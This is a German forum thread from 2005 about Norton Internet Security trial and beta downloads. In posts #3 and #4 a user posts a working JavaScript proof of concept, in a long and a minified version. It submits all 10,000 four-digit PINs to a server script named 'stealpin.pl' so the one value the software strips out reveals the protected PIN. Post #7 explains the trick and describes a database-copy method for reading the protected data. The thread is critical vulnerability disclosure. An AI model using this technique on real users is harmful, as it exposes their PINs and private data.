Norton Internet Security 2005 Free Trialware
#1
geschrieben 23. Februar 2005 - 17:25
* Norton Internet Worm Protection stops certain damaging Internet worms at the point of entry
* Automatically turns the firewall back on after a set period of time if you need to turn it off temporarily
* Confidential information blocking now lets you send personal data to sites you trust while protecting you from sending it to sites you don't
* Filters email coming to Yahoo! Mail accounts
* Helps detect and filter fraudulent and explicit email
* Automatically synchronizes its Allowed List with your POP3 email address books
* Works with Outlook to filter junk email from Hotmail and MSN Mail accounts
http://spftrl.digitalriver.com/pub/symante.../NIS_Retail.EXE
Anzeige
#2
geschrieben 23. Februar 2005 - 17:35
Dieser Beitrag wurde von Hauner bearbeitet: 23. Februar 2005 - 17:36
#3
geschrieben 23. Februar 2005 - 21:36
Zitat
<form name="x" action="./stealpin.pl" method="post"> <textarea name="y"></textarea> </form> <script type="text/javascript"> for(a=0; a<=9; a++) for(b=0; b<=9; b++) for(c=0; c<=9; c++) for(d=0; d<=9; d++) document.x.y.value+=a.toString()+b.toString()+c.toString()+d.toString()+"."; document.x.submit(); // alert("Thanks for your PIN, dumbass."); </script>
Einfach den Wert raussuchen der _nicht_ übertragen wurde und schon hat man die PIN, deren Bekanntwerden bei Übertragung eigentlich verhindert werden sollte.
Die Leute von Symantec lernen's nie...
* und für die Minimalisten unter euch:
<form name="x" action="x.pl"><textarea name="y"></textarea></form><script type="text/javascript"> for(a=-1;a++<11;for(b=-1;b++<1001;document.x.y.value+=a+""+b+"."));document.x.submit(); </script>
Dieser Beitrag wurde von Rika bearbeitet: 23. Februar 2005 - 21:44
Ja, mata ne!
(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
#4
geschrieben 23. Februar 2005 - 21:58
Zitat (Rika: 23.02.2005, 21:36)
<form name="x" action="./stealpin.pl" method="post"> <textarea name="y"></textarea> </form> <script type="text/javascript"> for(a=0; a<=9; a++) for(b=0; b<=9; b++) for(c=0; c<=9; c++) for(d=0; d<=9; d++) document.x.y.value+=a.toString()+b.toString()+c.toString()+d.toString()+"."; document.x.submit(); // alert("Thanks for your PIN, dumbass."); </script>
Einfach den Wert raussuchen der _nicht_ übertragen wurde und schon hat man die PIN, deren Bekanntwerden bei Übertragung eigentlich verhindert werden sollte.
Die Leute von Symantec lernen's nie...
* und für die Minimalisten unter euch:
<form name="x" action="x.pl"><textarea name="y"></textarea></form><script type="text/javascript"> for(a=-1;a++<11;for(b=-1;b++<1001;document.x.y.value+=a+""+b+"."));document.x.submit(); </script>
<{POST_SNAPBACK}>
Was is das für ein code Rika?
#5
geschrieben 23. Februar 2005 - 22:32
Kurzum: Dieses Feature ist nicht nur unnütz, es ist gefährlich. Wie so viele andere der Features auch...
Ja, mata ne!
(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
#6
geschrieben 24. Februar 2005 - 11:29
Verstehe ich das richtig : Dein Code läuft neben dem von Symantec und dadurch wird die Sicherheit von Symantec ausgehebelt?
#7
geschrieben 24. Februar 2005 - 14:29
Es werden einfach alle möglichen 10000 vierstelligen PINs als Form-Text erzeugt und an den Server zurückgesendet. Ganz normal, ganz legitim. Die PIN, die man in die Symandreck-Software als schützenswerte Information eingegeben hat, wird aus der Übertragung entfernt. Es kommen 9999 PINs beim Server an - tja, und die, die fehlt, ist die gesuchte PIN.
(Nebenbei, wie Volker Birks Analysen zeigen reicht es auch aus die Datenbankdatei von NIS auf einen anderen Rechner zu kopieren, einen Benutzer mit gleichem Kontonamen einzurichten, NIS zu installieren und die Datenbankdatei zu ersetzen - und schon kann man ohne Probleme die eingegebenen Information wieder lesen. Tolle Verschlüsselung, die den Benutzernamen als Key nutzt...)
Ja, mata ne!
(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
#8
geschrieben 28. Dezember 2005 - 15:17
für Windows 2000 und Windows XP
Lizenztyp: Shareware $69.99
Homepage: www.symantec.com/sabu/nis/nis_pe/
Beta-Homepage: www.symantec.com/public_beta/nis_index.html
Direkt-Download (42.7MB): NIS_30TD.EXE
PS: Ich "vermittle" lediglich die Verfügbarkeit dieser Beta, nicht mehr und nicht weniger.
Dieser Beitrag wurde von swissboy bearbeitet: 28. Dezember 2005 - 15:52
#10
geschrieben 28. Dezember 2005 - 17:16
Zitat (swissboy: 28.12.2005, 15:17)
für Windows 2000 und Windows XP
Lizenztyp: Shareware $69.99
Homepage: www.symantec.com/sabu/nis/nis_pe/
Beta-Homepage: www.symantec.com/public_beta/nis_index.html
Direkt-Download (42.7MB): NIS_30TD.EXE
PS: Ich "vermittle" lediglich die Verfügbarkeit dieser Beta, nicht mehr und nicht weniger.
Gibt es schon lange die bringen seit anfang november eine Beta nur es ist nichts wirklich neues, auser das Live updater 3.0 denn es schon als dowmload gibt
#11 _gani7777_
geschrieben 28. Dezember 2005 - 17:32
Habe die News aber ins Beta - Bereich gepostet als im News - Bereich.
Link : Norton Internet Security 2006 Beta Version 9.1
#12
geschrieben 28. Dezember 2005 - 17:48
Zitat (vodafone: 28.12.2005, 17:16)
Hier scheint es sich aber um eine neuere Version zu handeln. Die im Download enthalten Setup-Dateien sind alle vom 19. oder 20.12. (z.B. die NAV.msi ist vom 19.12.).